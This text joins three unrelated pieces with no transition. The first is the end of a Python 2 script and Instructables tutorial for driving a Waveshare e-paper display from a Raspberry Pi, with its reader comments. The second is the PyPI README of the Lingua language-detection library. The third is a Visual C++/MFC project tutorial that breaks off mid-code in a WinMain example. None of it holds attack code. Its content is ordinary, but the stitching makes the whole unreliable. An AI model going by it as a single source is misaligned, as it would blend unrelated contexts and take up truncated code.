Ah ha. I found the link for the full test case in the original email support case. The problem does indeed stop if I downgrade the project to Xamarin.Forms 1.4.3.6376 and start again if I upgrade to Xamarin.Forms 1.4, so the behavior matches Bug 32988 (and the closely related Bug 33181).
I will accordingly mark this bug as a duplicate.
*** This bug has been marked as a duplicate of bug 32988 *** | https://bugzilla.xamarin.com/show_bug.cgi?id=37413 | CC-MAIN-2019-09 | refinedweb | 429 | 61.22 |
ExceptionCode.
INDEX_SIZE_ERR: If index or size is negative, or greater than the allowed value.
DOMSTRING_SIZE_ERR: If the specified range of text does not fit into a DOMString.
HIERARCHY_REQUEST_ERR: If any node is inserted somewhere it doesn't belong.
WRONG_DOCUMENT_ERR: If a node is used in a different document than the one that created it (that doesn't support it).
INVALID_CHARACTER_ERR: If an invalid or illegal character is specified, such as in a name. See production 2 in the XML specification for the definition of a legal character, and production 5 for the definition of a legal name character.
NO_DATA_ALLOWED_ERR: If data is specified for a node which does not support data.
NO_MODIFICATION_ALLOWED_ERR: If an attempt is made to modify an object where modifications are not allowed.
NOT_FOUND_ERR: If an attempt is made to reference a node in a context where it does not exist.
NOT_SUPPORTED_ERR: If the implementation does not support the requested type of object or operation.
INUSE_ATTRIBUTE_ERR: If an attempt is made to add an attribute that is already in use elsewhere.
The above are since DOM Level 1
INVALID_STATE_ERR: If an attempt is made to use an object that is not, or is no longer, usable.
SYNTAX_ERR: If an invalid or illegal string is specified.
INVALID_MODIFICATION_ERR: If an attempt is made to modify the type of the underlying object.
NAMESPACE_ERR: If an attempt is made to create or change an object in a way which is incorrect with regard to namespaces.
INVALID_ACCESS_ERR: If a parameter or an operation is not supported by the underlying object.
The above are since DOM Level 2
VALIDATION_ERR: If a call to a method such as insertBefore or removeChild would make the Node invalid with respect to "partial validity", this exception would be raised and the operation would not be done.
TYPE_MISMATCH_ERR: If the type of an object is incompatible with the expected type of the parameter associated to the object, this exception would be raised.
The above is since DOM Level 3
Default constructor for DOMException.
Constructor which takes an error code and an optional message code.
Copy constructor.
Destructor for DOMException.
Referenced by getMessage(). | http://xerces.apache.org/xerces-c/apiDocs-3/classDOMException.html | CC-MAIN-2021-49 | refinedweb | 354 | 55.24 |
Getting Groovy
Doug Sabers, Object Partners
Scott Vlaminck, SmartThings
What is Groovy
- lightweight
- dynamic
- optionally typed
- object-oriented
- runs on the JVM
- compiles to Java bytecode
- runs on Java 1.5 and newer
- open source
- inspired by languages like Python, Ruby and Smalltalk
Think of Groovy as an extension of the JDK
Plays nice with Java
Groovy provides seamless integration with the Java Runtime Environment.
Groovy is only a new way of creating ordinary Java classes -- from a runtime perspective
You can call Java classes from your Groovy code and vice versa
Get Groovy
Almost all Java code is valid Groovy code
Let's convert this Java code to Groovy
public class Hello {
public static void main(String[] args) {
for (int i = 0; i < 3; i++) {
System.out.print("hello ");
}
System.out.println("Code People");
}
}
Groovy magic
Groovy allows you to write less code by providing some defaults.
The following packages are imported by default in Groovy
- java.io.*
- java.lang.*
- java.math.BigDecimal
- java.math.BigInteger
- java.net.*
- java.util.*
- groovy.lang.*
- groovy.util.*
So we can write code like this without an import statement:
def now = new Date()
def file = new File("/Users/Doug/test.txt")
def url = new URL('")
def list = new ArrayList()
Using Def
def is a keyword to replace a type name when declaring a variable. Basically it means we don't want to define the type ourselves. This is called "duck typing". The type of the variable is determined at runtime.
Code Examples
Groovy Strings
- Known as GStrings
- Surrounded by double quotes
- regular strings are surrounded by single quotes
- can contain Groovy expressions inside ${ }
def fname = "Doug"
def lname = "Sabers"
println "Hello, my name is ${fname} ${lname}"
Groovy List and Maps
def myList = [2014, 1, 2, -9, 0, 8987987987]
println myList[0]
println myList.size()
def myMap = ["name": "Doug", "age": 37, "favNumber": 87.13 ]
println myMap.name
println myMap["age"]
Groovy Truth
def a = true
def b = true
def c = false
assert a
assert a && b
assert a || c
assert !c
code examples
closures
You can create chunks of code that can be passed around
def square = {it * it }
square(8)
Reading a file
def file = new File("/Users/Doug/Desktop/dougfile.txt")
file.eachLine {
println it
}
Regular expressions
I had a problem that could only be solved by regex, now I have 2 problems...
import java.util.regex.Pattern
Pattern myPattern = ~/\p{Digit}{1,3}-\p{Digit}{1,2}-\p{Digit}{1,4}/
def var = "1-2-2"
var.matches(myPattern)
Testing your java code with Spock
- Already using Java JUnit? converting to Spock is easy and fun
- Detailed information using Groovy's power asserts
- Makes tests readable
- Compatible with JUnit - uses JUnit's reporting capabilities
- Better Mocking
- Spock Web Console for playing -
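The slides stop short of showing an actual specification, so here is a small hand-written sketch of one (the class and values are invented; it assumes the Spock dependency is on your classpath):

```groovy
import spock.lang.Specification

class MathSpec extends Specification {

    def "Math.max picks the larger of two numbers"() {
        expect: "Groovy power asserts show every sub-expression on failure"
        Math.max(a, b) == c

        where: "the test runs once per data-table row"
        a | b || c
        1 | 3 || 3
        7 | 4 || 7
        0 | 0 || 0
    }
}
```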
Groovy is everywhere
Groovy -
Grails - full stack web application framework
GPars for concurrency -
Gradle for build automation -
Geb - groovy wrapper around WebDriver -
RatPack - toolkit for building high performance web apps -
Gaelyk - Deploy apps on Google App Engine
GroovyFX - Groovy binding for JavaFX
Griffon - Groovy desktop applications
GVM - tool for managing parallel Versions of multiple SDKs on most Unix based systems
Want to learn more?
Groovy User Group of MN -
Questions?
Getting Groovy
By Doug Sabers
Getting Groovy | http://slides.com/sabersd/getting-groovy | CC-MAIN-2017-39 | refinedweb | 536 | 56.69 |
I was just compiling a program using Visual Studio C++ and it gave me an error saying that size_t was not part of the standard library. Explaining a little bit more: in the C standard library there is a standard type size_t which can only be assigned a positive int number.
I have a line of code saying
typedef std::size_t size_type;
which defines the size type as size_t. It didnt give me any errors while running on Linux, however in Visual Studio I get an error saying
error C2039: 'size_t' : is not a member of 'std'
Does this mean that maybe my standard libraries in visual studio need an update or is there any other reason why it is giving me this error
Thanx in advance byeeee
I Speak in frequencies even dogs have trouble hearing
That is all I got on this.
THANX for the post but Im still confused jeje Ill try to update my libraries and see what happens
size_t is part of the ANSI C Standard Library, and is of type unsigned int. Check with Microsoft if there are any updates to your libraries and headers that corrects this deviation from ANSI C.
Get OpenSolaris
youve assigned size_t to the namespace std. *nix might have just ignored the namespace and just used the size_t while the windows compiler is a little more stringent.
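For what it's worth, the usual root cause of this exact error is a missing header rather than an outdated library: std::size_t is declared in <cstddef>, and gcc's headers happen to pull it in indirectly while Visual C++'s don't. A sketch of the portable spelling:

```cpp
#include <cstddef>  // declares std::size_t on every conforming compiler

typedef std::size_t size_type;  // now compiles under MSVC as well

// Trivial use of the typedef, just to show it in action.
inline size_type bytes_in_int() { return sizeof(int); }
```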
all size_t is is an usigned ing why dont you just use
typedef unsigned int size_type;
*ing should have been int
That which does not kill me makes me stronger -- Friedrich Nietzche
OData enablement is a subject of significance, especially considering the pressing needs of frameworks that facilitate state-of-the-art user interfaces. It is made more important by another high-demand requirement: multichannel access to services and solutions.
It is evident that OData is endorsed in the SAP world. In fact, the ABAP stack has a pretty mature out-of-the-box availability of OData enablement.
The blog "What's new in Process Orchestration 7.31 SP09/7.4 SP04" provides an introduction to BPM OData services. It's not only pleasing to realize the availability of an OData service for BPM, but it also reflects the importance of 'OData exposure for technologies'.
In the light of realization of the significance of OData enablement, there are a few use cases which still stand devoid of OData enablement – a situation that we recently came across in our team. They were :
Need for exposure of not only BPM but CAF (Composite Application Framework) services as well in form of OData services.
- Existing CAF based solutions with WebDynpro and VC as front end might want to move to UI5 based state-of-the-art solutions, to be also able to have multiple device access enablement. The wish here would be that this should be possible with minimal effort. We should be able to draw advantage of the layered architecture. Thus utilizing most of the existing solution.
Exposure of BPM for PO versions before 7.31 SP 09, with minimal effort for achieving OData enablement.
Ahead in the article, I will present the approach used to achieve OData enablement from the point of view of the components involved (and a step-wise description, perhaps later, if needed).
The OData enablement is done for two scenarios:
Exposing CAF service as an OData Endpoint. (CAF services then, may or may not, initiate a BPM process)
Exposing BPM as an OData endpoint
Prerequisite:
- We used the odata4j library as a dependency for OData capabilities. The odata4j library download information may be accessed at this link.
- For creation of the OData request we used:
So, here is a synopsis of the steps we followed:
Exposing CAF service as OData Endpoint
1. Create and fire an OData request from the OData consumer (which may or may not be a web module composing the OData request to act as an OData consumer).
2. Façade DC invokes the CAF service – Query parameters are extracted from the OData request and used to invoke CAF services through JNDI invocation.
A few points about this Façade Development Component:
- Request is received at one of the exposed end-points (from within a web module, separately deployable as an enterprise DC).
- This web module performs an EJB invocation to a CAF operation (which can then invoke the BPM service).
- The web module has dependencies on a DC created as type ‘External Library’, which consists of the jar files from the odata4j library. Also, the web module has created a namespace for the OData request and registered the resource as well.
- Query parameters are extracted from the request payload.
- Make the actual EJB invocation for the CAF service from the createEntity endpoint, to initiate a BPM process.
3. The BPM service is invoked from within a CAF service, through a web service.
4. BPM Process Instance ID is returned.
5. BPM Process instance id is further returned to OData producer.
6. OData response entity is created and returned to the OData Consumer
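To make the façade's endpoint step a little more concrete, here is a rough Java sketch of its shape. Every name below (the path, the JNDI string, the service interface) is hypothetical, and the real web module builds a proper OData entity response through odata4j instead of returning plain text:

```java
import javax.naming.InitialContext;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.QueryParam;

@Path("/LeaveRequests") // hypothetical entity set exposed by the facade
public class LeaveRequestResource {

    // Hypothetical business interface of the CAF application service.
    public interface LeaveRequestService {
        String createLeaveRequest(String requester, String subject);
    }

    @POST
    public String createEntity(@QueryParam("requester") String requester,
                               @QueryParam("subject") String subject)
            throws Exception {
        // JNDI invocation of the CAF service (the name is made up).
        InitialContext ctx = new InitialContext();
        LeaveRequestService svc =
                (LeaveRequestService) ctx.lookup("ejb/LeaveRequestService");

        // The CAF operation starts the BPM process and hands back the
        // process instance id, which becomes the OData response payload.
        return svc.createLeaveRequest(requester, subject);
    }
}
```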
Exposing BPM as an OData endpoint
Depending on the NW version you have, you will be faced with a choice of which of the solutions below to follow:
For versions 7.31 SP9 and above:
These versions come with default OData enablement of BPM and so they may be directly consumed.
For versions 7.31 SP8 and below:
For these versions there is no default OData support available and so we will do façade creation as follows:
1. Create and fire an OData request from the OData consumer (which may or may not be a web module composing the OData request to act as an OData consumer).
2. Façade DC initiates BPM – Query parameters are extracted from the OData request and used to initiate the BPM process.
A few points about this Façade Development Component:
- Request is received at one of the exposed end-points (from within a web module, separately deployable as an enterprise DC).
- The web module has dependencies on the DC created as type ‘External Library’, which consists of the jar files from the odata4j library. Also, the web module has created a namespace for the OData request and also registered the resource.
- Query parameters are extracted from the request payload.
- This web module initiates the BPM process, with the help of the BPM Java APIs.
3. The response is sent to OData producer.
4. OData response entity is created and returned to the OData Consumer.
Some additional points to be taken care of while making the solution work could be with respect to cross-origin request handling and authentication.
Conclusion:
Having performed the above steps creates a short, quick and yet proper (hopefully!) solution to give OData enablement to your PO stack’s BPM and CAF, which then gives you the capability to consume services from any technology like JavaScript, Java, .NET, etc.
Great blog, very interesting.
How about using Olingo Java library? I think right now it’s a prominent Java OData client/server API, possibly more than OData4J
What’s your take on it?
Thanks, regards
Vincenzo
Hi Vincenzo,
Thanks!
Even I have tried to answer the same question at my end, for projects in my organisation.
In one line: I believe Olingo is the better way to implement the facade layer to integrate with backend (CAF or otherwise).
Reasons why I believe (and a brief comparison) are as follows:
1. OData4J does not have any support or strong community to help you out. You have to invest a bit more in learning OData4J. Olingo is Apache’s library and has got the support of SAP as well. It also seems to have a good community. With time, this should grow for Olingo and there are no signs of such support with OData4J.
2. If I am not wrong to quote(and if I remember correctly), OData4J will not have support for OData version 4, which will be supported by Olingo (clearly mentioned on the home page of Olingo). This brings to a stage where one will HAVE TO adopt Olingo sooner or later. So why not sooner!
These two are compelling advantages in favor of Apache Olingo, as they ensure support.
The only good thing I personally like about OData4J is the way it registers classes for exposing as OData entities. One can use backend (CAF / bean) classes to register when exposing them as OData entities. Whereas, in Olingo, each variable of a class needs to be added as a property. This requires mirroring of the whole backend class in the facade layer (when using Olingo). Having said this, there is an easy way to bypass it by creating a little bit of a utility class (using Java Reflection) to do that manual work for us.
Hence, overall, I totally agree with you that Olingo should be used as the facade provider. | https://blogs.sap.com/2014/04/14/odata-endpoints-for-po-stack-bpm-caf-facade-way/ | CC-MAIN-2018-43 | refinedweb | 1,173 | 53.61 |
axes
An alternative implementation of d3's quantitative scales
An alternative to d3's quantitative scales that handles multiple axes a little more conveniently.
I've found that in larger d3 projects I tend to create a few duplicate scales across multiple charts, when really they'd be easier to manage and update as a group: passed around into each chart as required, responding to updates made in other parts of the code.
Installation
$ npm install --save axes
Example
var linedata = require('./linedata.json')
var bardata = require('./bardata.json')
var d3 = require('d3')

var axes = require('axes')()
  .def('barX')
  .domain([0, bardata.length])
  .def('barY')
  .domain([0, d3.max(bardata)])
  .def('lineX')
  .domain([0, linedata.length])
  .def('lineY')
  .domain([0, d3.max(linedata)])
  .root()

// Alias your scales so they play nice
// with the code you're giving it.
axes.barX(2) // 0.5
axes.alias({ x: 'barX' }).x(2) // 0.5

// Throw them into your charts
require('./barchart')({
  axes: axes.alias({
    x: 'barX'
  , y: 'barY'
  })
})

require('./linechart')({
  axes: axes.alias({
    x: 'lineX'
  , y: 'lineY'
  })
})

// Use `axis.map` for alternative value
// mappings.
var angle = axes.barX.map(function(n) {
  return n.value * Math.PI * 2
})

angle({ value: 2 }) // 3.14159265...
API
axis = require('axes').def()
Returns an anonymous scale, which is very similar to d3.scale.linear, but with a more limited API.
axis.domain([domain])
Takes a 2-element array defining the minimum and maximum input values for the scale.
axis.range([range])
Takes a 2-element array defining the minimum and maximum output values for the scale.
axis()
Returns a number between range[0] and range[1] depending on how far it is between domain[0] and domain[1].
axis.on('update', handler(key))
The "update" event is called on handler every time the axis' range or domain properties are updated.
axis.copy()
Creates a copy of the axis, so that you can change its domain and range values without altering the original one.
scale = axis.map([map])
Returns a scale that maps its output according to map. The initial value will be scaled based on axis's output. You can update these values in the original scale and the scale's range will update accordingly too.
scale()
The returned scale essentially boils down to:
axis.map(mapper)(n) === mapper(axis(n))
axes = require('axes')()
Returns a new group of axes.
member = axes.def(name)
Returns a named scale, attached to this group.
member.root()
Returns the group of axes.
member[fork|alias|def]()
The fork, alias and def methods on each group member will be called from the group, to make for easier chaining.
axes.fork(new, old)
Creates a copy of the group's member called old, under the new name new.
axes.alias(map)
Returns a copy of the group, while preserving the original references to each member. map is an object: the keys determine the new name, and the values determine the old one.
var axes = require('axes')()
  .def('oldX')
  .range([0, 100])

var aliased = axes.alias({ newX: 'oldX' })

axes.oldX(0.5)    // 50
aliased.newX(0.5) // 50
aliased.oldX(0.5) // Object #<Object> has no method 'oldX'
axes.copy()
Copies the whole group, copying each member reference as well so you can make changes to this copy without having to worry about altering the other scales.
New firmware for the Slampher
There are a number of reviews of the Slampher that focus on the basic usage or that go more in depth tearing it apart or flashing custom firmware. As you can guess, I'm more interested in the latter. I already exposed my reasons in my post about the S20 Smart Socket and this week it has become more apparent as a report from Bitdefender has uncovered a bug on a commercially available smart socket that would allow attackers to create a malicious botnet. An army of owned sockets!
We are only a few days away from the arrival of the ESP32 and the ESP8266 is still one of the kings of the IoT block, and a really successful one. Itead's choice of using Espressif chips on their home automation line of products makes them a hacker's dream.
There are a few firmware projects available that will work on the Slampher, including my Espurna Firmware. Most of them have MQTT support and a web configuration portal. Some, like the Espurna, are light enough to support OTA with the 1Mb flash memory that the Sonoff or the Slampher have.
GPIO0 problem
The Slampher and the Sonoff RF both have an 8-bit EFM8BB10F2G-A-QFN20 microcontroller (from the EFM8 Busy Bee family) by Silabs that listens to the radio module messages and handles the on-board button.
The EFM8BB1 intercepts the button events so it can enter into “pairing mode” when the user double-clicks the button. In pairing mode it listens and stores a new radio code that will become the code to toggle on and off the switch from then on. But the curious thing is that if there is a single click event it just pulls down GPIO0 in the ESP8266 like the button does in the non-RF versions. So Sonoff firmware will work just the same except for:
- You cannot use the button to enter flash mode in the ESP8266 (since it’s a user firmware event that pulls GPIO0 down and no user firmware is running at boot time).
- You can’t use double click events on your firmware because these are intercepted by the EFM8BB1, unless they are more than about half a second away from each other.
- You can’t use long click events since the EFM8BB1 pulls GPIO0 down only on button release for about 125ms.
Issues #2 and #3 you will have to live with. My Espurna firmware uses double click and long click events to enter AP mode and to reset the board respectively. That will not work on the Slampher. I could extend the double click interval in the DebounceEvent library from 500ms to 1000ms, but it won't be very user friendly.
Issue #1 has different solutions. Scargill suggests moving resistor R21 to R20, so the button is then attached to ESP8266 GPIO0 (check the schematic at the Itead wiki). Problem is that you lose the ability to pair your remote. Of course you could pair it first and then move the resistor, but chances are that in the long run you will need to pair it more often than flash it, because you have OTA.
Flashing the Slampher.
Of course I'm assuming you have a stable OTA-able firmware and that you have a testing platform (I have a Sonoff just for that). Also, you can add a new button between the pad and GND to flash the device in a more comfortable way.
Radio control
The radio receiver chip is a SYN470R by Synoxo in a 16 pin SOP package. This is a ASK/OOK RF transparent link (an “antenna-in to data-out” as the manufacturer says). It needs a microncontroller to act as a logic decoder. You can configure the bandwidth and it has a WAKEUP pin you can use to wake up your controller when there is a radio signal.
First I tried to pair it with my Avidsen remote without success. Then I used another remote I have for Noru radio sockets and it worked! Kind of… The red LED in the radio modules blinked while pairing it but not all the buttons worked. Only ON1, OFF2, OFF3 and 8H buttons on my Noru remote actually work with the Slampher. Weird.
Decoding the radio signals
So I reviewed my own post about decoding radio signals, but instead of using my Bus Pirate I gave the RCSwitch library a try first, using the basic receiver example and adding some code to output “normalized” data strings. I started by decoding the 4 buttons of the remote Itead is selling. This is the code I used:
#include <RCSwitch.h>

RCSwitch mySwitch = RCSwitch();

void setup() {
    Serial.begin(115200);
    mySwitch.enableReceive(0); // receiver on interrupt 0 => pin #2 on most boards
}

void loop() {
    if (mySwitch.available()) {

        Serial.print(mySwitch.getReceivedProtocol());

        char binary[25] = {0};
        char tristate[13] = {0};
        int count = 0;
        int tri = 0;
        unsigned int * timings = mySwitch.getReceivedRawdata();

        // 24 data bits, one per pulse pair; a long second pulse is a '1'
        for (int i=1; i<49; i=i+2) {
            binary[count++] = (timings[i] > 500) ? '1' : '0';
            if (count % 2 == 0) {
                if (binary[count-2] == '0') {
                    tristate[tri++] = (binary[count-1] == '0') ? '0' : 'F';
                } else {
                    tristate[tri++] = (binary[count-1] == '0') ? 'X' : '1';
                }
            }
        }

        Serial.print(" Binary: ");
        Serial.print(binary);
        Serial.print(" Tristate: ");
        Serial.println(tristate);

        mySwitch.resetAvailable();
    }
}
The output of the 4 buttons from the Itead remote is:
As you can see they are 24 bit messages where the first 20 are the same for the 4 buttons and then there is only one bit set for the remaining 4 bits. The 4 buttons in the Noru remote that work have only 1 bit set in the last 4. That’s why the remote Itead sells has only 4 buttons. I still don’t know if I can use Itead’s remote with the Noru sockets since I never managed to know the relation between button codes (between ON and OFF buttons that control the same socket). But they don’t look compatible…
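In other words, each 24-bit code is the remote's fixed 20-bit identifier followed by a one-hot nibble, one bit per button. A little helper makes the relationship explicit (the 20-bit base used below is a made-up placeholder, not the real id of my remote):

```cpp
#include <cstdint>
#include <vector>

// Build the four 24-bit button codes from a remote's 20-bit prefix:
// the high 20 bits are shared, and exactly one of the low 4 bits
// is set for each button.
inline std::vector<uint32_t> button_codes(uint32_t base20) {
    std::vector<uint32_t> codes;
    for (int n = 0; n < 4; ++n) {
        codes.push_back((base20 << 4) | (1u << n));
    }
    return codes;
}
```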
Note: one funny thing is that there is another EFM8BB1 microcontroller on the radio module. What? Maybe the radio decoding is done in this second chip while the one in the Slampher board is just responsible for the button and the GPIO0?
Wrapping up
The Slampher might be a bit bulky and it won't fit in all the lamps (it does protrude from the living room lamp cover at home) but it's a fine device for home automation. My criticism of the eWeLink app and my concerns about really owning the device still stand. But I will no doubt tell you: go buy one, flash it with your own firmware and enjoy.
"New firmware for the Slampher" was first posted on 23 August 2016 by Xose Pérez on tinkerman.cat under. | https://tinkerman.cat/post/new-firmware-for-the-slampher | CC-MAIN-2019-22 | refinedweb | 1,153 | 69.11 |
Object Pooling in Unity
In this tutorial, you’ll learn how to create your own object pooler in Unity in a fun 2D shooter.
In this scenario, you’re outnumbered 1000 to 1. There’s no need to give the Neptunians the upper hand with unexpected memory spikes. Sound familiar? Go ahead and pull up a chair and get up to speed on Object Pooling.
In this Unity tutorial, you’ll learn:
- All about object pooling
- How to pool a game object
- How to expand your object pool at runtime if necessary
- How to extend your object pool to accommodate different objects
By the end of this tutorial, you’ll have a generic script you can readily drop into a new game. Additionally, you’ll understand how to retrofit the same script for an existing game.
Prerequisites: You’ll need to be familiar with some basic C# and how to work within Unity’s development environment. If you need some assistance getting up to speed, check out the Unity tutorials on this site.
What is Object Pooling?
Instantiate() and
Destroy() are useful and necessary methods during gameplay. Each generally requires minimal CPU time.
However, for objects created during gameplay that have a short lifespan and get destroyed in vast numbers per second, the CPU needs to allocate considerably more time.
Bullets are a great example of a GameObject that you might pool.
Additionally, Unity uses Garbage Collection to deallocate memory that’s no longer in use. Repeated calls to
Destroy() frequently trigger this task, and it has a knack for slowing down CPUs and introducing pauses to gameplay.
This behavior is critical in resource-constrained environments such as mobile devices and web builds.
Object pooling is where you pre-instantiate all the objects you’ll need at any specific moment before gameplay — for instance, during a loading screen. Instead of creating new objects and destroying old ones during gameplay, your game reuses objects from a “pool”.
Getting Started
If you don’t already have Unity 5 or newer, download it from Unity’s website.
Download the starter project, unzip and open
SuperRetroShooter_Starter project in Unity — it’s a pre-built vertical scroll shooter.
Note: Credit goes to Master484, Marcus, Luis Zuno and Skorpio for the medley of art assets from OpenGameArt. The royalty-free music was from the excellent Bensound.
Feel free to have a look at some of the scripts, such as Barrier; they are generic and useful, but their explanations are beyond the scope of this tutorial.
As you work through everything, it will be helpful to see what’s happening in your game’s Hierarchy during gameplay. Therefore, I recommend that you deselect Maximize on Play in the Game Tab’s toolbar.
Click the play button to see what you have. :]
Note how there are many
PlayerBullet(Clone) objects instantiated in the Hierarchy when shooting. Once they hit an enemy or leave the screen, they are destroyed.
Making matters worse is the act of collecting those randomly dropped power-ups; they fill the game’s Hierarchy with bullet clones with just a few shots and destroy them all the very next second.
In its current state, Super Retro Shooter is a “bad memory citizen”, but you’ll be the hero that gets this shooter firing on all cylinders and using resources more scrupulously.
Time to Get Your Feet Wet
Click on the Game Controller GameObject in the Hierarchy. Since this object will persist in the Scene, you’ll add your object pooler script here.
In the Inspector, click the Add Component button, and select New C# Script. Give it the name ObjectPooler.
Double-click the new script to open it in MonoDevelop, and add the following code to the class:
public static ObjectPooler SharedInstance; void Awake() { SharedInstance = this; }
Several scripts will need to access the object pool during gameplay, and
public static instance allows other scripts to access it without getting a Component from a GameObject.
At the top of the script, add the following
using statement:
using System.Collections.Generic;
You’ll be
using a generic list to store your pooled objects. This statement gives you access to generic data structures so that you can use the
List class in your script.
Note: Generic? Nobody wants to be generic! Everybody wants to be special!
In a programming language like C#, generics allow you to write code that can be used by many different types while still enforcing type safety.
Typically, you use generics when working with collections. This approach allows you to have an array that only allows one type of object, preventing you from putting a dog inside a cat array, although that could be pretty funny. :]
Speaking of lists, add the object pool list and two new public variables:
public List<GameObject> pooledObjects; public GameObject objectToPool; public int amountToPool;
The naming is fairly self-explanatory.
By using the Inspector in Unity, you’ll be able to specify a GameObject to pool and a number to pre-instantiate. You’ll do that in a minute.
Meanwhile, add this code to Start():
pooledObjects = new List<GameObject>(); for (int i = 0; i < amountToPool; i++) { GameObject obj = (GameObject)Instantiate(objectToPool); obj.SetActive(false); pooledObjects.Add(obj); }
The
for loop will instantiate the
objectToPool GameObject the specified number of times in
numberToPool. Then the GameObjects are set to an inactive state before adding them to the
pooledObjects list.
Go back to Unity and add the Player Bullet Prefab to the objectToPool variable in the Inspector. In the numberToPool field, type 20.
Run the game again. You should now have 20 pre-instantiated bullets in the Scene with nowhere to go.
Well done! You now have an object pool. :]
Dipping into the Object Pool
Jump back into the ObjectPooler script and add the following new method:
public GameObject GetPooledObject() { //1 for (int i = 0; i < pooledObjects.Count; i++) { //2 if (!pooledObjects[i].activeInHierarchy) { return pooledObjects[i]; } } //3 return null; }
The first thing to note is that this method has a
GameObject return type as opposed to
void. This means a script can ask for a pooled object from
GetPooledObject and it'll be able to return a GameObject in response. Here's what else is happening here:
- This method uses a
forloop to iterate through your
pooledObjectslist.
- You check to see if the item in your list is not currently active in the Scene. If it is, the loop moves to the next object in the list. If not, you exit the method and hand the inactive object to the method that called
GetPooledObject.
- If there are currently no inactive objects, you exit the method and return nothing.
Now that you can ask the pool for an object, you need to replace your bullet instantiation and destroy code to use the object pool instead.
Player bullets are instantiated in two methods in the
ShipController script.
Shoot()
ActivateScatterShotTurret()
Open the ShipController script in MonoDevelop and find the lines:
Instantiate(playerBullet, turret.transform.position, turret.transform.rotation);
Replace both instances with the following code:
GameObject bullet = ObjectPooler.SharedInstance.GetPooledObject(); if (bullet != null) { bullet.transform.position = turret.transform.position; bullet.transform.rotation = turret.transform.rotation; bullet.SetActive(true); }
Note: Make sure this replacement is made in both
Shoot() and
ActivateScatterShotTurret() before you continue.
Previously, the methods iterated through the list of currently active turrets on the player's ship (depending on power-ups) and instantiated a player bullet at the turrets position and rotation.
You've set it to ask your
ObjectPooler script for a pooled object. If one is available, it's set to the position and rotation of the turret as before, and then set to
active to rain down fire upon your enemy. :]
Get Back in the Pool
Instead of destroying bullets when they're no longer required, you'll return them to the pool.
There are two methods that destroy unneeded player bullets:
OnTriggerExit2D()in the
DestroyByBoundaryscript removes the bullet when it leaves the screen.
OnTriggerEnter2D()in the
EnemyDroneControllerscript removes the bullet when it collides and destroys an enemy.
Open DestroyByBoundary in MonoDevelop and replace the contents of the
OnTriggerExit2D method with this code:
if (other.gameObject.tag == "Boundary") { if (gameObject.tag == "Player Bullet") { gameObject.SetActive(false); } else { Destroy(gameObject); } }
Here's a generic script that you can attach to any number of objects that need removal when they leave the screen. You check if the object that triggered the collision has the
Player Bullet tag -- if yes, you set the object to inactive instead of destroying it.
Similarly, open EnemyDroneController and find
OnTriggerEnter2D(). Replace
Destroy(other.gameObject); with this line of code:
other.gameObject.SetActive(false);
Wait!
Yes, I can see you hovering over the play button. After all that coding, you must be itching to check out your new object pooler. Don't do it yet! There is one more script to modify -- don't worry, it's a tiny change. :]
Open the BasicMovement script in MonoDevelop and rename the
Start Method to
OnEnable.
One gotcha when you use the object pool pattern is remembering that the lifecycle of your pooled object is a little different.
Ok, now click play. :]
As you shoot, the inactive player bullet clones in the Hierarchy become active. Then they elegantly return to an inactive state as they leave the screen or destroy an enemy drone.
Well Done!
But what happens when you collect all those power-ups?
Running out of ammo eh?
As the game designer, you enjoy supreme powers, such as limiting players' firepower to encourage a more focused strategy as opposed to just shooting everything and everywhere.
You could exert your powers to do this by adjusting the number of bullets you initially pool to get this effect.
Conversely, you can also go in the other direction pool a huge number of bullets to cover all power-up scenarios. That begs a question: why would you pool 100 bullets for the elusive ultimate power-up when 90 percent of the time 50 bullets is adequate?
You would have 50 bullets in memory that you would only need rarely.
The Incredible Expanding Object Pool
Now you'll modify the object pool so you can opt to increase the number of pooled objects at runtime if needed.
Open the ObjectPooler script in MonoDevelop and add this new public variable:
public bool shouldExpand = true;
This code creates a checkbox in the Inspector to indicate whether it's possible to increase the number of pooled objects.
In
GetPooledObject(), replace the line
return null; with the following code.
if (shouldExpand) { GameObject obj = (GameObject)Instantiate(objectToPool); obj.SetActive(false); pooledObjects.Add(obj); return obj; } else { return null; }
If a player bullet is requested from the pool and no inactive ones can be found, this block checks to see it's possible to expand the pool instead of exiting the method. If so, you instantiate a new bullet, set it to inactive, add it to the pool and return it to the method that requested it.
Click play in Unity and try it out. Grab some power-ups and go crazy. Your 20 bullet object pool will expand as needed.
Object Pool Party
Invariably, lots of bullets mean lots of enemies, lots of explosions, lots of enemy bullets and so on.
To prepare for the onslaught of madness, you'll extend the object pooler so it handles multiple object types. You'll take it a step further and will make it possible to configure each type individually from one place in the Inspector.
Add the following code above the ObjectPooler class:
[System.Serializable] public class ObjectPoolItem { }
[System.Serializable] allows you to make instances of this class editable from within the Inspector.
Next, you need to move the variables
objectToPool,
amountToPool and
shouldExpand into the new
ObjectPoolItem class. Heads up: you'll introduce some errors in the ObjectPooler class during the move, but you'll fix those in a minute.
Update the
ObjectPoolItem class so it looks like this:
[System.Serializable] public class ObjectPoolItem { public int amountToPool; public GameObject objectToPool; public bool shouldExpand; }
Any instance of
ObjectPoolItem can now specify its own data set and behavior.
Once you've added the above public variables, you need make sure to delete those variables from the
ObjectPooler. Add the following to
ObjectPooler:
public List<ObjectPoolItem> itemsToPool;
This is new list variable that lets you hold the instances of
ObjectPoolItem.
Next you need to adjust
Start() of
ObjectPooler to ensure all instances of
ObjectPoolItem get onto your pool list. Amend
Start() so it looks like the code below:
void Start () { pooledObjects = new List<GameObject>(); foreach (ObjectPoolItem item in itemsToPool) { for (int i = 0; i < item.amountToPool; i++) { GameObject obj = (GameObject)Instantiate(item.objectToPool); obj.SetActive(false); pooledObjects.Add(obj); } } }
In here, you added a new
foreach loop to iterate through all instances of ObjectPoolItem and add the appropriate objects to your object pool.
You might be wondering how to request a particular object from the object pool – sometimes you need a bullet and sometimes you need more Neptunians, you know?
Tweak the code in
GetPooledObject so it matches the following:
public GameObject GetPooledObject(string tag) { for (int i = 0; i < pooledObjects.Count; i++) { if (!pooledObjects[i].activeInHierarchy && pooledObjects[i].tag == tag) { return pooledObjects[i]; } } foreach (ObjectPoolItem item in itemsToPool) { if (item.objectToPool.tag == tag) { if (item.shouldExpand) { GameObject obj = (GameObject)Instantiate(item.objectToPool); obj.SetActive(false); pooledObjects.Add(obj); return obj; } } } return null; }
GetPooledObject now takes a
string parameter so your game can request an object by its
tag. The method will search the object pool for an inactive object that has a matching tag, and then it returns an eligible object.
Additionally, if it finds no appropriate object, it checks the relevant
